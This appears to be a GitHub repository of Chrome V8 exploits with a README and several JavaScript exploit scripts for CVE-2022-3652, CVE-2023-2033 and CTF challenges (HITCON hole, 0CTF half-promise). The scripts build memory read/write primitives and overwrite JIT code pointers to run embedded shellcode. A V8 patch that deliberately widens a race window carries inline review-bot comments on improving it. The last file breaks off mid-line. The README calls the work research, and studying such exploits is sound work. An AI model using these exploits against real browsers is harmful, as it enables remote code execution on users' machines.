├── CVE-2023-4427 ├── poc.html └── poc.js ├── .gitmodules ├── LICENSE ├── CVE-2022-3652 ├── lock.diff └── exp.js ├── README.md ├── 2023-0ctf-half-promise.js ├── CVE-2023-2033.js ├── 2022-hitcon-hole.js ├── CVE-2020-6418.js ├── CVE-2018-17463.js ├── 34C3-v9.js └── CVE-2022-1310.js /CVE-2023-4427/poc.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "CVE-2024-1939"] 2 | path = CVE-2024-1939 3 | url = https://github.com/rycbar77/CVE-2024-1939 4 | [submodule "CVE-2024-2887"] 5 | path = CVE-2024-2887 6 | url = https://github.com/rycbar77/CVE-2024-2887 7 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 r4z77 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /CVE-2022-3652/lock.diff: -------------------------------------------------------------------------------- 1 | diff --git a/src/compiler/js-create-lowering.cc b/src/compiler/js-create-lowering.cc 2 | index 4cc0a9a3af4..9cee701a56f 100644 3 | --- a/src/compiler/js-create-lowering.cc 4 | +++ b/src/compiler/js-create-lowering.cc 5 | @@ -25,6 +25,7 @@ 6 | #include "src/objects/js-regexp-inl.h" 7 | #include "src/objects/objects-inl.h" 8 | 9 | +volatile intptr_t mylock = 0; 10 | namespace v8 { 11 | namespace internal { 12 | namespace compiler { 13 | @@ -1096,6 +1097,7 @@ Reduction JSCreateLowering::ReduceJSCreateLiteralArrayOrObject(Node* node) { 14 | CreateLiteralParameters const& p = n.Parameters(); 15 | Effect effect = n.effect(); 16 | Control control = n.control(); 17 | + while (mylock != 1 && mylock!=2); 18 | ProcessedFeedback const& feedback = 19 | broker()->GetFeedbackForArrayOrObjectLiteral(p.feedback()); 20 | if (!feedback.IsInsufficient()) { 21 | @@ -1824,6 +1826,7 @@ base::Optional JSCreateLowering::TryAllocateFastLiteral( 22 | for (auto const& inobject_field : inobject_fields) { 23 | builder.Store(inobject_field.first, inobject_field.second); 24 | } 25 | + mylock = 2; 26 | return builder.Finish(); 27 | } 28 | 29 | diff --git a/src/objects/js-objects-inl.h b/src/objects/js-objects-inl.h 30 | index 0ad9acfce4d..511561b06fa 100644 31 | --- a/src/objects/js-objects-inl.h 32 | +++ b/src/objects/js-objects-inl.h 33 | 
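Review bot: `volatile intptr_t mylock = 0;` is shared between the main thread (JSObject::SetMapAndElements) and the concurrent TurboFan job (JSCreateLowering), but `volatile` only forces each access to be issued — it gives no atomicity and no ordering against the surrounding non-volatile loads and stores, so the boilerplate reads after the spin in ReduceJSCreateLiteralArrayOrObject and the `set_elements` after the spin in js-objects-inl.h are unordered relative to the flag under the C++ memory model; the trigger works by the luck of x86 ordering rather than by contract. Use `std::atomic<intptr_t> mylock{0};` (add `#include <atomic>` to the include block), spin on `mylock.load(std::memory_order_acquire)` and publish with `mylock.store(2, std::memory_order_release)`, and change the `extern volatile intptr_t mylock;` declaration in js-objects-inl.h to match. Because this patch deliberately widens the CVE-2022-3652 race window rather than fixing anything, a marker such as `// DEBUG ONLY: deterministic race trigger for CVE-2022-3652 reproduction; never ship` above the definition would keep it from being mistaken for a fix.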
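Review bot: `mylock = 2;` is only reached on the success path of TryAllocateFastLiteral, immediately before `return builder.Finish();`; the function returns a base::Optional, so if any earlier bail-out fires after the compile job has passed the wait in ReduceJSCreateLiteralArrayOrObject, the main thread parked in SetMapAndElements (`while(mylock!=2);`) never wakes and the isolate hangs instead of reproducing the bug. Release on every exit instead, e.g. a small RAII guard declared right after the wait whose destructor performs the `mylock = 2` store, so a failed fast-literal attempt still lets the main thread finish its transition. TryAllocateFastLiteral's body starts well outside the hunk, so the existence and position of those bail-outs is inferred from the Optional return type rather than visible here.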
@@ -26,6 +26,8 @@ 34 | // Has to be the last include (doesn't have include guards): 35 | #include "src/objects/object-macros.h" 36 | 37 | +extern volatile intptr_t mylock; 38 | + 39 | namespace v8 { 40 | namespace internal { 41 | 42 | 
@@ -247,6 +249,10 @@ void JSObject::SetMapAndElements(Handle object, Handle new_map, 43 | DCHECK((*value == ReadOnlyRoots(isolate).empty_fixed_array()) || 44 | (object->map().has_fast_double_elements() == 45 | value->IsFixedDoubleArray())); 46 | + if (mylock==0) { 47 | + mylock=1; 48 | + while(mylock!=2); 49 | + } 50 | object->set_elements(*value); 51 | } 52 | 53 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # V8Exploits 2 | Chrome V8 CVE exploits and proof-of-concept scripts written by me, for educational and research purposes only. 3 | 4 | ## CVES 5 | 6 | ### CVE-2018-17463 7 | 8 | hash: 568979f4d891bafec875fab20f608ff9392f4f29 9 | 10 | env: Linux 11 | 12 | details: https://xz.aliyun.com/t/13075 13 | 14 | #### references 15 | 16 | http://p4nda.top/2019/06/11/%C2%96CVE-2018-17463/ 17 | 18 | https://bugs.chromium.org/p/chromium/issues/detail?id=888923 19 | 20 | ### CVE-2022-1310 21 | 22 | hash: e1e92f8ba77145568e781b47b31ad82535e868bf 23 | 24 | env: Windows 25 | 26 | #### references 27 | 28 | https://bugs.chromium.org/p/chromium/issues/detail?id=1307610 29 | 30 | https://paper.seebug.org/1955/ 31 | 32 | ### CVE-2022-3652 33 | 34 | ver: 10.6.194.12 35 | 36 | env: linux 37 | 38 | race condition, use lock to make it easy to trigger. 
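Review bot: `if (mylock==0) { mylock=1; while(mylock!=2); }` is a non-atomic check-then-set on a variable the compile thread also writes, and because it is unconditional, the first SetMapAndElements call that reaches this line — whatever object and whatever caller — claims the handshake and blocks the main thread until a concurrent TurboFan job happens to reach the `mylock = 2` store; with no compile in flight that is a hard hang, not a reproduction of CVE-2022-3652. With `mylock` as `std::atomic<intptr_t>` the claim becomes `intptr_t expected = 0; if (mylock.compare_exchange_strong(expected, 1)) { while (mylock.load(std::memory_order_acquire) != 2) {} }`, and gating it on a second flag that the compiler raises before it starts waiting would stall only a transition that is actually racing an in-flight compile. The pause is placed after the DCHECK that the map's elements kind agrees with `value` but before `object->set_elements(*value)`, i.e. the object is deliberately left observable mid-transition; a comment such as `// DEBUG ONLY: park here so the concurrent compiler sees the new map with the old elements` would say so, though whether the map has already been updated at this point depends on code above the hunk and is inferred. SetMapAndElements starts outside the hunk.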
39 | 40 | #### references 41 | 42 | https://bugs.chromium.org/p/chromium/issues/detail?id=1369871 43 | 44 | ### CVE-2023-2033 45 | 46 | hash: f7a3499f6d7e50b227a17d2bbd96e4b59a261d3c 47 | 48 | env: Linux 49 | 50 | #### references 51 | 52 | https://github.com/mistymntncop/CVE-2023-2033 53 | 54 | https://bugs.chromium.org/p/chromium/issues/detail?id=1445008 55 | 56 | https://bugs.chromium.org/p/chromium/issues/detail?id=1432210 57 | 58 | https://h0meb0dy.me/entry/TheHole-Exploit-from-TheHole-to-Shellcode 59 | 60 | https://cwresearchlab.co.kr/entry/CVE-2023-2033-JIT-optimisation-issue 61 | 62 | https://cwresearchlab.co.kr/entry/Chrome-v8-Hole-Exploit 63 | 64 | ### CVE-2023-4427 65 | 66 | hash: 610c1976fe17b5bfb12eefe1e6dc7c3a5bd5141a 67 | 68 | 出在了强网杯的决赛,当时只在本地打通了,赛后修改了一下,用一个新线程来稳定内存布局,还是不太稳定,不确定是否为预期解。 (English: this was a challenge in the QWB CTF finals; at the time it only worked locally. After the contest I reworked it to spawn a new thread to stabilise the heap layout, but it is still not very reliable and I am not sure it is the intended solution.) 69 | 70 | POC analysis: https://rycbar77.github.io/2023/12/01/CVE-2023-4427%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/ 71 | 72 | ### CVE-2020-6418 73 | 74 | bi0sctf 2024 ezv8 75 | 76 | #### references 77 | 78 | https://chromium.googlesource.com/v8/v8.git/+/d65423559f2ed0f24f69994906fbad0860501799%5E!/ 79 | 80 | ### CVE-2024-0517 81 | 82 | xctf-final 0ob 83 | 84 | See https://github.com/rycbar77/writeups/tree/master/2024/xctf-final/0ob 85 | 86 | ### CVE-2024-1939 87 | 88 | V8CTF M122 89 | 90 | ### CVE-2024-2887 91 | 92 | V8CTF M123 93 | 94 | ## CTF 95 | 96 | ### 34C3 v9 97 | 98 | #### references 99 | 100 | https://github.com/saelo/v9 101 | 102 | ### 2022 hitcon hole 103 | 104 | #### references 105 | 106 | ### 2023 0ctf half-promise 107 | 108 | Hijacks the wasm instance's `jump_table_start` pointer to control `rip`.
109 | 110 | ### 2024 PlaidCTF Maglev 111 | 112 | See https://github.com/rycbar77/writeups/tree/master/2024/plaidctf/maglev 113 | 114 | ### 2024 htb-bussiness pwn_pyrrhus 115 | 116 | See https://github.com/rycbar77/writeups/tree/master/2024/htb-bussiness/pwn_pyrrhus 117 | 118 | ### 2024 Google-ctf heat 119 | 120 | See https://github.com/rycbar77/writeups/tree/master/2024/google-ctf/heat 121 | 122 | ### 2024 hitconctf V8 SBX 123 | 124 | See https://github.com/rycbar77/writeups/tree/master/2024/hitconctf/V8%20SBX 125 | 126 | ### 2024 sekaictf ContextReducer 127 | 128 | See https://github.com/rycbar77/writeups/blob/master/2024/sekaictf/ContextReducer/ -------------------------------------------------------------------------------- /CVE-2022-3652/exp.js: -------------------------------------------------------------------------------- 1 | /* eslint-disable camelcase */ 2 | /* eslint-disable no-extend-native */ 3 | /* eslint-disable no-unused-vars */ 4 | /* eslint-disable require-jsdoc */ 5 | function gc_minor() { 6 | for (let i = 0; i < 1000; i++) { 7 | new ArrayBuffer(0x10000); 8 | } 9 | } 10 | 11 | function gc_major() { 12 | new ArrayBuffer(0x7fe00000); 13 | } 14 | 15 | const buf = new ArrayBuffer(16); 16 | const float64 = new Float64Array(buf); 17 | const bigUint64 = new BigUint64Array(buf); 18 | function f2i(f) { 19 | float64[0] = f; 20 | return bigUint64[0]; 21 | } 22 | function i2f(i) { 23 | bigUint64[0] = i; 24 | return float64[0]; 25 | } 26 | 27 | Number.prototype.toBigInt = function toBigInt() { 28 | float64[0] = this; 29 | return bigUint64[0]; 30 | }; 31 | 32 | BigInt.prototype.toNumber = function toNumber() { 33 | bigUint64[0] = this; 34 | return float64[0]; 35 | }; 36 | 37 | function hex(i) { 38 | return i.toString(16).padStart(16, '0'); 39 | } 40 | 41 | // =================== // 42 | // Start here! 
// 43 | // =================== // 44 | 45 | function sleep(miliseconds) { 46 | const currentTime = new Date().getTime(); 47 | while (currentTime + miliseconds >= new Date().getTime()) {} 48 | } 49 | 50 | function a(f) { 51 | const c = [1.33753945707788105686024880174e-318, 2.2, , 4.4]; 52 | const aaa = Math.log(2); 53 | if (f) { 54 | c[0] = {}; 55 | } 56 | return c; 57 | } 58 | 59 | for (let i = 0; i < 4516; i++) a(false); 60 | a(false); 61 | 62 | a(true); 63 | 64 | sleep(1000); 65 | 66 | const shellcode = () => { 67 | return [1.95538254221075331056310651818E-246, 68 | 1.95606125582421466942709801013E-246, 69 | 1.99957147195425773436923756715E-246, 70 | 1.95337673326740932133292175341E-246, 71 | 2.63486047652296056448306022844E-284]; 72 | }; 73 | 74 | for (let i = 0; i < 0x10000; i++) { 75 | shellcode(); shellcode(); shellcode(); shellcode(); 76 | } 77 | sleep(1000); 78 | 79 | gc_minor(); 80 | gc_major(); 81 | 82 | const test = [ 83 | 1.86417340672235361759473944203e-310, 1.11253692938735068472773773438e-308, 84 | 3.3, 4.4, 85 | ]; 86 | // %DebugPrint(test); 87 | const obj_arr = [{}, {}, {}, {}]; 88 | // %DebugPrint(obj_arr); 89 | const driver_arr = [1.1, 2.2, 3.3, 4.4]; 90 | // %DebugPrint(driver_arr); 91 | // %SystemBreak(); 92 | 93 | const ccc = a(false); 94 | // console.log(ccc[3]); 95 | const arr = ccc[0]; 96 | // console.log(hex(f2i(arr[37]))); 97 | // %SystemBreak(); 98 | 99 | function addrof(obj) { 100 | obj_arr[0] = obj; 101 | return arr[11]; 102 | } 103 | 104 | // const tt=[1.1]; 105 | // // %DebugPrint(tt); 106 | // const tt2=addrof(tt); 107 | // console.log(hex(f2i(tt2)&0xffffffffn)); 108 | 109 | function aar(addr) { 110 | const fake_length_elements = (8n << 32n) | (addr - 8n); 111 | arr[37] = i2f(fake_length_elements); 112 | return driver_arr[0]; 113 | } 114 | 115 | // let t=1.1; 116 | // let res=aar(f2i(addrof(t))&0xffffffffn); 117 | // console.log(res) 118 | 119 | function aaw(addr, value) { 120 | const fake_length_elements = (8n << 32n) | (addr - 
8n); 121 | arr[37] = i2f(fake_length_elements); 122 | driver_arr[0] = value; 123 | } 124 | 125 | // let test_arr = [4.4, 2.2]; 126 | // aaw((f2i(addrof(test_arr)) & 0xffffffffn) + 0x20n, 3.3); 127 | // console.log(test_arr); 128 | 129 | // %DebugPrint(shellcode); 130 | // %SystemBreak(); 131 | const shellcode_addr = f2i(addrof(shellcode))&0xffffffffn; 132 | console.log(hex(shellcode_addr)); 133 | const code_addr = f2i(aar(shellcode_addr + 0x18n)) & 0xffffffffn; 134 | console.log(hex(code_addr)); 135 | const real_inst = f2i(aar(code_addr + 0x10n)) + 0x60n; 136 | console.log(hex(real_inst)); 137 | aaw(code_addr + 0x10n, i2f(real_inst)); 138 | // %SystemBreak(); 139 | shellcode(); 140 | -------------------------------------------------------------------------------- /2023-0ctf-half-promise.js: -------------------------------------------------------------------------------- 1 | class Helpers { 2 | constructor() { 3 | this.buf = new ArrayBuffer(8); 4 | this.dv = new DataView(this.buf); 5 | this.u8 = new Uint8Array(this.buf); 6 | this.u32 = new Uint32Array(this.buf); 7 | this.u64 = new BigUint64Array(this.buf); 8 | this.f32 = new Float32Array(this.buf); 9 | this.f64 = new Float64Array(this.buf); 10 | 11 | this.roots = new Array(0x30000); 12 | this.index = 0; 13 | } 14 | 15 | pair_i32_to_f64(p1, p2) { 16 | this.u32[0] = p1; 17 | this.u32[1] = p2; 18 | return this.f64[0]; 19 | } 20 | 21 | i64tof64(i) { 22 | this.u64[0] = i; 23 | return this.f64[0]; 24 | } 25 | 26 | f64toi64(f) { 27 | this.f64[0] = f; 28 | return this.u64[0]; 29 | } 30 | 31 | set_i64(i) { 32 | this.u64[0] = i; 33 | } 34 | 35 | set_l(i) { 36 | this.u32[0] = i; 37 | } 38 | 39 | set_h(i) { 40 | this.u32[1] = i; 41 | } 42 | 43 | get_i64() { 44 | return this.u64[0]; 45 | } 46 | 47 | ftoil(f) { 48 | this.f64[0] = f; 49 | return this.u32[0] 50 | } 51 | 52 | ftoih(f) { 53 | this.f64[0] = f; 54 | return this.u32[1] 55 | } 56 | 57 | add_ref(object) { 58 | this.roots[this.index++] = object; 59 | } 60 | 61 | 
mark_sweep_gc() { 62 | new ArrayBuffer(0x7fe00000); 63 | } 64 | 65 | scavenge_gc() { 66 | for (var i = 0; i < 8; i++) { 67 | // fill up new space external backing store bytes 68 | this.add_ref(new ArrayBuffer(0x200000)); 69 | } 70 | this.add_ref(new ArrayBuffer(8)); 71 | } 72 | 73 | hex(i) { 74 | return i.toString(16).padStart(16, "0"); 75 | } 76 | 77 | breakpoint() { 78 | this.buf.slice(); 79 | } 80 | } 81 | 82 | var helper = new Helpers(); 83 | 84 | // =================== // 85 | // Start here! // 86 | // =================== // 87 | 88 | var sbxMemView = new Sandbox.MemoryView(0, 0xfffffff8); 89 | var addrOf = (o) => Sandbox.getAddressOf(o); 90 | 91 | var dv = new DataView(sbxMemView); 92 | 93 | var readHeap4 = (offset) => dv.getUint32(offset, true); 94 | var readHeap8 = (offset) => dv.getBigUint64(offset, true); 95 | 96 | var writeHeap1 = (offset, value) => dv.setUint8(offset, value, true); 97 | var writeHeap4 = (offset, value) => dv.setUint32(offset, value, true); 98 | var writeHeap8 = (offset, value) => dv.setBigUint64(offset, value, true); 99 | 100 | //ceb580067616c68 101 | //ceb5a6674656768 102 | //cebf63120e0c148 103 | //ceb50d231d00148 104 | //50f583b6ae78948 105 | // console.log(helper.i64tof64(0xceb580067616c68n)) 106 | // console.log(helper.i64tof64(0xceb5a6674656768n)) 107 | // console.log(helper.i64tof64(0xcebf63120e0c148n)) 108 | // console.log(helper.i64tof64(0xceb50d231d00148n)) 109 | // console.log(helper.i64tof64(0x50f583b6ae78948n)) 110 | 111 | helper.scavenge_gc(); 112 | const shellcode = () => { 113 | 114 | return [1.9553825376526264e-246, 115 | 1.956052573379787e-246, 116 | 1.9995714719542577e-246, 117 | 1.9533767332674093e-246, 118 | 2.6348604765229606e-284]; 119 | 120 | } 121 | 122 | for (var i = 0; i < 0x1000000; i++) { 123 | shellcode(); shellcode(); shellcode(); shellcode(); 124 | } 125 | 126 | let inst = readHeap4(0x40a159 + 0x10 - 1); 127 | 128 | inst += 0x62; 129 | console.log(helper.hex(inst)); 130 | 131 | var wasmCode = new 
Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]); 132 | var wasmModule = new WebAssembly.Module(wasmCode); 133 | var wasmInstance = new WebAssembly.Instance(wasmModule); 134 | var f = wasmInstance.exports.main; 135 | 136 | let wasmAddr = addrOf(wasmInstance) 137 | console.log("wasmInstance @ " + wasmAddr.toString(16)); 138 | 139 | 140 | cage_base = readHeap4(0x40014) 141 | console.log("CAGE_BASE @ " + cage_base.toString(16)) 142 | 143 | writeHeap8(wasmAddr + 0x60 - 0x8 - 0x10, helper.f64toi64(helper.pair_i32_to_f64(inst, cage_base))); 144 | 145 | f() 146 | 147 | -------------------------------------------------------------------------------- /CVE-2023-2033.js: -------------------------------------------------------------------------------- 1 | function gc_minor() { 2 | for (let i = 0; i < 1000; i++) { 3 | new ArrayBuffer(0x10000); 4 | } 5 | } 6 | 7 | function gc_major() { 8 | new ArrayBuffer(0x7fe00000); 9 | } 10 | 11 | var buf = new ArrayBuffer(16); 12 | var float64 = new Float64Array(buf); 13 | var bigUint64 = new BigUint64Array(buf); 14 | 15 | function f2i(f) { 16 | float64[0] = f; 17 | return bigUint64[0]; 18 | } 19 | 20 | function i2f(i) { 21 | bigUint64[0] = i; 22 | return float64[0]; 23 | } 24 | 25 | Number.prototype.toBigInt = function toBigInt() { 26 | float64[0] = this; 27 | return bigUint64[0]; 28 | }; 29 | 30 | BigInt.prototype.toNumber = function toNumber() { 31 | bigUint64[0] = this; 32 | return float64[0]; 33 | }; 34 | 35 | function hex(i) { 36 | return i.toString(16).padStart(16, "0"); 37 | } 38 | 39 | // =================== // 40 | // Start here! 
// 41 | // =================== // 42 | 43 | function load_stack() { 44 | let a = stack; 45 | return a; 46 | } 47 | 48 | Error.captureStackTrace(globalThis); 49 | Error.prepareStackTrace = () => { 50 | delete stack; 51 | Object.defineProperty(globalThis, 'stack', { value: 1, writable: true }); // configurable: false 52 | stack = {}; // cell_type == kMutable 53 | 54 | for (let i = 0; i < 0x10000; i++) { load_stack(); } 55 | } 56 | 57 | Object.defineProperty(globalThis, 'stack', { value: 1, configurable: true }); 58 | delete stack; 59 | let hole = load_stack(); // the_hole 60 | 61 | // console.log(hole); 62 | 63 | 64 | // must be const 65 | const the = { 66 | hole: hole 67 | }; 68 | 69 | let f_arr; 70 | let o_arr; 71 | 72 | let floatMap; 73 | let floatProperty; 74 | 75 | function oob(bool) { 76 | let hole = the.hole; 77 | let idx = (Number(bool ? hole : -1) | 0) + 1; 78 | 79 | f_arr = [1.1]; 80 | let compressedPointer = f2i(f_arr.at(idx * 1)); 81 | floatMap = compressedPointer & 0xffffffffn; 82 | floatProperty = compressedPointer >> 32n; 83 | } 84 | 85 | for (var i = 0; i < 0x10000; i++) { 86 | oob(true); 87 | } 88 | // % PrepareFunctionForOptimization(oob); 89 | // oob(true); 90 | // % OptimizeFunctionOnNextCall(oob); 91 | // oob(true); 92 | // console.log(oob(true)); 93 | 94 | 95 | // primitive addrof 96 | function addrof(bool, obj) { 97 | let hole = the.hole; 98 | let idx = (Number(bool ? hole : -1) | 0) + 1; // 1 or 0 99 | f_arr = [1.1]; 100 | o_arr = [obj]; 101 | // return f2i(f_arr.at(idx * 4)) & 0xffffffffn; 102 | return f2i(f_arr.at(idx * 4)) & 0xffffffffn; 103 | } 104 | 105 | for (var i = 0; i < 0x10000; i++) { 106 | addrof(true, {}); 107 | } 108 | 109 | // % PrepareFunctionForOptimization(addrof); 110 | // addrof(true,{}); 111 | // % OptimizeFunctionOnNextCall(addrof); 112 | // addrof(true,{}); 113 | 114 | // primitive fakeobj 115 | function fakeobj(bool, addr) { 116 | let hole = the.hole; 117 | let idx = (Number(bool ? 
hole : -1) | 0) + 1; 118 | addr = i2f(addr); 119 | 120 | o_arr = [{}]; 121 | f_arr = [addr]; 122 | 123 | let fake_obj = o_arr.at(idx * 7); 124 | return fake_obj; 125 | } 126 | 127 | for (var i = 0; i < 0x10000; i++) { 128 | fakeobj(true, f2i(1.1)); 129 | } 130 | 131 | // % PrepareFunctionForOptimization(fakeobj); 132 | // fakeobj(true, f2i(1.1)); 133 | // % OptimizeFunctionOnNextCall(fakeobj); 134 | // fakeobj(true, f2i(1.1)); 135 | 136 | // primitive arbitrary address read 137 | function aar(addr) { 138 | let fake_obj_header = [1.1, 2.2]; 139 | fake_obj_header[0] = i2f((floatProperty << 32n) | floatMap); 140 | fake_obj_header[1] = i2f((2n << 32n) | (addr - 8n)); 141 | let dbl_arr_struct_addr = addrof(true, fake_obj_header); 142 | let fake_dbl_arr = fakeobj(true, dbl_arr_struct_addr - 0x10n); 143 | return fake_dbl_arr[0]; 144 | } 145 | 146 | function aaw(addr, value) { 147 | let fake_obj_header = [1.1, 2.2]; 148 | fake_obj_header[0] = i2f((floatProperty << 32n) | floatMap); 149 | fake_obj_header[1] = i2f((2n << 32n) | (addr - 8n)); 150 | let dbl_arr_struct_addr = addrof(true, fake_obj_header); 151 | 152 | let fake_dbl_arr = fakeobj(true, dbl_arr_struct_addr - 0x10n); 153 | fake_dbl_arr[0] = i2f(value); 154 | } 155 | 156 | 157 | gc_major(); 158 | const shellcode = () => { 159 | return [1.95538254221075331056310651818E-246, 160 | 1.95606125582421466942709801013E-246, 161 | 1.99957147195425773436923756715E-246, 162 | 1.95337673326740932133292175341E-246, 163 | 2.63486047652296056448306022844E-284]; 164 | } 165 | 166 | for (var i = 0; i < 0x10000; i++) { 167 | shellcode(); 168 | } 169 | //% PrepareFunctionForOptimization(shellcode); 170 | //shellcode(); 171 | //% OptimizeFunctionOnNextCall(shellcode); 172 | //shellcode(); 173 | 174 | //%DebugPrint(shellcode); 175 | let shellcode_addr = addrof(true, shellcode); 176 | let code_addr = f2i(aar(shellcode_addr + 0x18n)) & 0xffffffffn; 177 | let real_inst = f2i(aar(code_addr + 0x10n)) + 0x56n; 178 | aaw(code_addr + 0x10n, 
real_inst); 179 | //%SystemBreak(); 180 | shellcode(); 181 | 182 | -------------------------------------------------------------------------------- /2022-hitcon-hole.js: -------------------------------------------------------------------------------- 1 | class Helpers { 2 | constructor() { 3 | this.buf = new ArrayBuffer(8); 4 | this.dv = new DataView(this.buf); 5 | this.u8 = new Uint8Array(this.buf); 6 | this.u32 = new Uint32Array(this.buf); 7 | this.u64 = new BigUint64Array(this.buf); 8 | this.f32 = new Float32Array(this.buf); 9 | this.f64 = new Float64Array(this.buf); 10 | 11 | this.roots = new Array(0x30000); 12 | this.index = 0; 13 | } 14 | 15 | pair_i32_to_f64(p1, p2) { 16 | this.u32[0] = p1; 17 | this.u32[1] = p2; 18 | return this.f64[0]; 19 | } 20 | 21 | i64tof64(i) { 22 | this.u64[0] = i; 23 | return this.f64[0]; 24 | } 25 | 26 | f64toi64(f) { 27 | this.f64[0] = f; 28 | return this.u64[0]; 29 | } 30 | 31 | set_i64(i) { 32 | this.u64[0] = i; 33 | } 34 | 35 | set_l(i) { 36 | this.u32[0] = i; 37 | } 38 | 39 | set_h(i) { 40 | this.u32[1] = i; 41 | } 42 | 43 | get_i64() { 44 | return this.u64[0]; 45 | } 46 | 47 | ftoil(f) { 48 | this.f64[0] = f; 49 | return this.u32[0] 50 | } 51 | 52 | ftoih(f) { 53 | this.f64[0] = f; 54 | return this.u32[1] 55 | } 56 | 57 | add_ref(object) { 58 | this.roots[this.index++] = object; 59 | } 60 | 61 | mark_sweep_gc() { 62 | new ArrayBuffer(0x7fe00000); 63 | } 64 | 65 | scavenge_gc() { 66 | for (var i = 0; i < 8; i++) { 67 | // fill up new space external backing store bytes 68 | this.add_ref(new ArrayBuffer(0x200000)); 69 | } 70 | this.add_ref(new ArrayBuffer(8)); 71 | } 72 | 73 | hex(i) { 74 | return i.toString(16).padStart(16, "0"); 75 | } 76 | 77 | breakpoint() { 78 | this.buf.slice(); 79 | } 80 | } 81 | 82 | var helper = new Helpers(); 83 | 84 | // =================== // 85 | // Start here! 
// 86 | // =================== // 87 | const shellcode = () => { 88 | return [1.95538254221075331056310651818E-246, 89 | 1.95606125582421466942709801013E-246, 90 | 1.99957147195425773436923756715E-246, 91 | 1.95337673326740932133292175341E-246, 92 | 2.63486047652296056448306022844E-284]; 93 | } 94 | 95 | // % PrepareFunctionForOptimization(shellcode); 96 | // shellcode(); 97 | // % OptimizeFunctionOnNextCall(shellcode); 98 | // shellcode(); 99 | for (let i = 0; i < 0x10000; i++) { shellcode(); shellcode(); shellcode(); shellcode(); } 100 | 101 | let arr = new Array(1); 102 | let hole = arr.hole(); 103 | // %DebugPrint(hole); 104 | let map = new Map(); 105 | map.set(1, 1); 106 | // console.log(map.size); 107 | map.set(hole, 1); 108 | // console.log(map.size); 109 | map.delete(hole); 110 | // console.log(map.size); 111 | map.delete(hole); 112 | // console.log(map.size); 113 | map.delete(1); 114 | % DebugPrint(map); 115 | // %SystemBreak(); 116 | // console.log(map.size); 117 | map.set(16, 1); 118 | let victim = new Array(1.1, 2.2); 119 | 120 | // %SystemBreak(); 121 | map.set(victim, 0xffff); 122 | // console.log(helper.hex(helper.f64toi64(victim[0]))); 123 | // %SystemBreak(); 124 | let driver_arr = new Array(1.1, 2.2); 125 | let victim_obj = new Array({}); 126 | 127 | 128 | function addr_of(obj) { 129 | victim_obj[0] = obj; 130 | return victim[18]; 131 | } 132 | // let obj={}; 133 | // %DebugPrint(obj); 134 | // let addr=addr_of(obj); 135 | // console.log(helper.hex(helper.ftoih(addr))); 136 | function aar(addr) { 137 | victim[6] = helper.pair_i32_to_f64(addr - 8, helper.ftoih(victim[6])); 138 | // console.log(helper.hex(helper.get_i64())); 139 | return driver_arr[0]; 140 | } 141 | // let obj = {}; 142 | // % DebugPrint(obj); 143 | // let addr = addr_of(obj); 144 | // console.log(helper.hex(helper.f64toi64(aar(helper.ftoih(addr))))); 145 | function aaw(addr, value) { 146 | victim[6] = helper.pair_i32_to_f64(addr - 8, helper.ftoih(victim[6])); 147 | // 
console.log(helper.hex(helper.get_i64())); 148 | driver_arr[0] = value; 149 | } 150 | // let obj = {}; 151 | // % DebugPrint(obj); 152 | // let addr = addr_of(obj); 153 | // aaw(helper.ftoih(addr), 1.1); 154 | 155 | % DebugPrint(victim); 156 | % DebugPrint(driver_arr); 157 | % DebugPrint(victim_obj); 158 | % DebugPrint(shellcode); 159 | // % SystemBreak(); 160 | let shellcode_addr = addr_of(shellcode); 161 | console.log(helper.hex(helper.ftoih(shellcode_addr))); 162 | // % SystemBreak(); 163 | let code = helper.ftoil(aar(helper.ftoih(shellcode_addr) + 0x18)); // code pointer of shellcode() 164 | console.log(helper.hex(code)); 165 | // % SystemBreak(); 166 | let inst = helper.f64toi64(aar(code + 0xC)); // instructions pointer of shellcode() 167 | console.log(helper.hex(inst)); 168 | // % SystemBreak(); 169 | inst += 0x60n; // address of actual shellcode 170 | aaw(code + 0xC, helper.i64tof64(inst)); 171 | // %SystemBreak(); 172 | shellcode(); 173 | // % SystemBreak(); 174 | 175 | 176 | -------------------------------------------------------------------------------- /CVE-2020-6418.js: -------------------------------------------------------------------------------- 1 | class Helpers { 2 | constructor() { 3 | this.buf = new ArrayBuffer(8); 4 | this.dv = new DataView(this.buf); 5 | this.u8 = new Uint8Array(this.buf); 6 | this.u32 = new Uint32Array(this.buf); 7 | this.u64 = new BigUint64Array(this.buf); 8 | this.f32 = new Float32Array(this.buf); 9 | this.f64 = new Float64Array(this.buf); 10 | 11 | this.roots = new Array(0x30000); 12 | this.index = 